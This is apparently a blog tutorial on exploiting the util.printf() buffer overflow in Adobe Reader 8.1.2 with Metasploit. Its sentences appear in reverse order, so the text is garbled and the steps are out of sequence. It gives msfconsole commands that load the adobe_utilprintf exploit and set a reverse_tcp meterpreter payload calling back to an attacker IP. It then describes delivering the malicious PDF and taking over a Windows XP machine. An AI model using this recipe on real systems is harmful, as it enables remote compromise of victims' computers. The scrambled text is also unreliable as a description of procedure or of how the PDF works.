The character # followed by two characters is a single character represented in a hexadecimal notation. We can’t really say anything definitive about this section, except that it uses a lot of different representation of any single character. Then there is the Body PDF section that is presented in the picture below: And the bytes are at the beginning of the file, because applications normally read a first few bytes of the file to determine if they can handle the specific file and open it. Those bytes are there for one reason only: so that the applications that work with ASCII data don’t try to handle and open the document, as it would fail. It’s a standard 1.5 PDF document with 4 random unicode bytes in the second line. For example, the Header of the PDF document is presented in the picture below: If we open the util_printf.pdf PDF document in a text editor like gvim, we can get some information out of it, but not all of it. The exploit works and gives us the meterpreter session that we want, so why should we care about the details of how this is done? Well, the beauty of everything is in the details, so in this section we’ll take a look at how the malicious PDF document was created and how it uses the vulnerable function to execute arbitrary code on the vulnerable computer. In our case, this is a Windows XP SP2 machine running on x86 (32 bit) architecture. This can be seen in the picture below, where we first enter into the new session with the “ sessions -i 1” command and then execute the sysinfo command, giving us the basic information about the compromised system. We can then use the newly created session to interact with the compromised computer. When we open the malicious PDF document in a vulnerable Adobe PDF Reader, a new meterpreter session should be opened as can be seen on the picture below: Then we need to copy it to the target machine (the one running the vulnerable version of Adobe PDF Reader) and open it. We can download the generated malicious PDF from the URI and save it on our hard drive as util_printf.pdf. At the end we’re executing the command exploitto run the configured actions. This IP will be used by the payload to connect back to us, creating a reverse meterpreter session, which will give us complete access to the compromised computer. These variables are PAYLOAD, which specifies the payload that will be executed upon successful execution of the exploit and LHOST, which sets the IP of our meterpreter computer. Then we’re setting some common Metasploit variables that are required for everything to work. Started reverse handler on 192.168.1.134:4444įirst we’re executing the command to use the adobe_utilprintf exploit. Msf exploit(adobe_utilprintf) > set LHOST 1 92.168.1.134 Msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp Msf > use exploit/windows/browser/adobe_utilprintf In order to do that we must download the Metasploit, start the msfconsole, and execute the commands below: Now we’ve come to the part where we need to test the Metasploit module. The right version of Adobe Reader is installed, which is the version 8.1.2. To do that, we can start the Adobe PDF Reader normally and click on Menu – Help – About Adobe Reader 8. When the installation process is complete, we can check whether the appropriate version was installed on the system. The installation process of the old vulnerable PDF Reader can be observed below: The vulnerable version of Adobe PDF Reader is 8.1.2 (including), which we need to download from the oldapps web page and install on the system. But which version do we need? Luckily the exploit for the util.printf() buffer overflow vulnerability can be found in the Metasploit modules as we can see oin the picture below: We need to search for a specific version of Adobe PDF Reader, which was vulnerable to the util.printf() buffer overflow vulnerability. The old version of PDF Reader can be found on various web pages, but most prominent web page is definitely oldapps.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |